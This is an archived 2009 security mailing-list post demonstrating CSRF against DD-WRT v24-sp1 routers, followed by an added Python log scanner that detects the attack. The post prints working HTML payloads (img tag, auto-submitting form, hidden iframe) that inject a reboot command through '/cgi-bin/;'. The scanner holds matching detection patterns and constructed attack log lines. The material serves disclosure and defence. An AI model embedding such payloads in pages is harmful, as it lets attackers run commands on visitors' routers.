Only thing I can say: You ROCK!!!!! dude
Sent from my iPhone
On Jul 25, 2009, at 5:35 PM, Adrian Crenshaw <[email protected]> wrote:
I heard Carlos talk about it, so I started to work on a writeup, which I'll post to my site shortly. Carlos, thanks for the idea.

I was interested in giving a real world example of a CSRF attack, similar to the ones I mentioned in my OWASP Top 5 video, and maybe use it against a piece of internal equipment that is behind a NAT box. Then I heard about Carlos Perez's write-up on using Metasploit against a vulnerability in the DD-WRT v24-sp1 firmware. I thought this would be a great way to demo the concept of using CSRF/XSS against hardware behind a NAT, especially since I've done a video on installing DD-WRT before. Some people think it's not a big deal since the attack request has to come from an internal source, but they don't think about the fact that CSRF can make the attack come from an internal source. Granted, this may not be considered a true CSRF from the standpoint that you don't have to have authenticated against your DD-WRT v24-sp1 router, but it works much the same way. Carlos' demo shows using Metasploit to open a shell on the router, then doing some other messing around; I'll just show how this vulnerability could be used to reboot the router just using HTML (there are far more deviant things you could do). For the most part this attack essentially amounts to pointing the browser at http://ip-of-router/cgi-bin/;some-command. Since the default IP for most home NAT routers is 192.168.1.1, this is a pretty easy attack that could be pulled off against people who browse a page that the attacker controls. The attacker would not have to explicitly have the victim go to http://ip-of-router/cgi-bin/;some-command to pull off the attack; there are plenty of ways to make a browser automatically make the request, for example:

IMG get:

<img src="http://192.168.1.1/cgi-bin/;reboot">

Post method:

<form name="csrfform" method="post" action="http://192.168.1.1/cgi-bin/;reboot">
  <input type='hidden' name='input_from_form' value="Test of auto submitted form.">
</form>
<script> document.csrfform.submit() </script>

IFRAME Get:

<iframe src="http://192.168.1.1/cgi-bin/;reboot" style="width:0px; height:0px; border: 0px"></iframe>

If you would like to test this code against your DD-WRT v24-sp1 click the link below:

DD-WRT test page, only click if you want your router to reboot

For information on the fix:
http://www.dd-wrt.com

Guess it's time to patch.
_______________________________________________
Pauldotcom mailing list
[email protected]
http://mail.pauldotcom.com/cgi-bin/mailman/listinfo/pauldotcom
Main Web Site: http://pauldotcom.com
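Detection-side companion to the request patterns in the quoted message, added here and not part of either message or of DD-WRT: it scans web-server access-log lines for the `/cgi-bin/;command` shape the thread describes and for requests that arrive with a Referer from another site, which is how a CSRF-delivered request looks in a log. It assumes Combined Log Format lines (the samples below are constructed, including the `evil.example` host; DD-WRT's own httpd log format is not assumed) and 192.168.1.1 as the router address.

```python
import re
from urllib.parse import urlsplit, unquote

# Assumed: Combined Log Format, as a generic web server would write it.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) \S+" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "[^"]*"$'
)
# The DD-WRT v24-sp1 shape from the thread: a ';' right after /cgi-bin/
# lets a command ride in the URL, so that prefix alone is worth an alert.
CGI_CMD_RE = re.compile(r'^/cgi-bin/;')


def parse_line(line):
    """Return the fields of one log line, or None if it is not CLF-shaped."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def classify(entry, router_hosts=("192.168.1.1",)):
    """Return a list of findings for one parsed request (empty if benign)."""
    findings = []
    path = unquote(entry["path"])  # catch %3B as well as a literal ';'
    if CGI_CMD_RE.match(path):
        findings.append("cgi-bin command injection attempt: " + path)
    ref_host = urlsplit(entry["referer"]).hostname if entry["referer"] != "-" else None
    if ref_host and ref_host not in router_hosts:
        # The request to the router was issued from a page on another site.
        findings.append("cross-site referer: " + ref_host)
    return findings


# Constructed sample log: one normal admin-page hit, an img/iframe-style GET and a
# form POST delivered from an outside page, and a URL-encoded attempt with no Referer.
SAMPLE_LOG = """\
192.168.1.23 - - [25/Jul/2009:17:35:01 -0400] "GET /index.asp HTTP/1.1" 200 4120 "http://192.168.1.1/" "Mozilla/5.0"
192.168.1.23 - - [25/Jul/2009:17:35:09 -0400] "GET /cgi-bin/;reboot HTTP/1.1" 200 0 "http://evil.example/page.html" "Mozilla/5.0"
192.168.1.23 - - [25/Jul/2009:17:35:10 -0400] "POST /cgi-bin/;reboot HTTP/1.1" 200 0 "http://evil.example/page.html" "Mozilla/5.0"
192.168.1.23 - - [25/Jul/2009:17:35:12 -0400] "GET /cgi-bin/%3Breboot HTTP/1.1" 200 0 "-" "curl/7.19"
"""


def scan(log_text, router_hosts=("192.168.1.1",)):
    """Return (ip, method, path, findings) for every line that raised a finding."""
    alerts = []
    for line in log_text.splitlines():
        entry = parse_line(line)
        if entry is None:
            continue
        findings = classify(entry, router_hosts)
        if findings:
            alerts.append((entry["ip"], entry["method"], entry["path"], findings))
    return alerts


if __name__ == "__main__":
    for ip, method, path, findings in scan(SAMPLE_LOG):
        print(ip, method, path, "; ".join(findings))
```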